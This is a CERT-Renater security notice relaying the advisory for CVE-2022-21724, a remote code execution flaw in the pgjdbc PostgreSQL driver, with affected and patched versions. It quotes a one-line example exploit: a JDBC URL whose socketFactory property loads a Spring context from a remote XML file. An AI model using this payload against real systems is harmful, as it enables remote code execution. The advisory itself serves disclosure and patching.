===================================================================== CERT-Renater Note d'Information No. 2021/VULN058 _____________________________________________________________________ DATE : 03/02/2022 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running org.postgresql (java) versions prior to 42.2.25, 42.3.2. ===================================================================== https://github.com/advisories/GHSA-v7wg-cpwc-24m4 https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4 https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813 _____________________________________________________________________ Remote code execution vulnerability using plugin features High severity GitHub Reviewed Vulnerability details Package org.postgresql:postgresql (maven) Affected versions >= 9.4.1208, < 42.2.25 >= 42.3.0, < 42.3.2 Patched versions 42.2.25 42.3.2 Description Impact pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. Here's an example attack using an out-of-the-box class from Spring Framework: DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml"); The first impacted version is REL9.4.1208 (it introduced socketFactory connection property) References GHSA-v7wg-cpwc-24m4 pgjdbc/pgjdbc@f4d0ed6 CVE ID CVE-2022-21724 CWEs CWE-74 CVSS Score 8.5 High CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================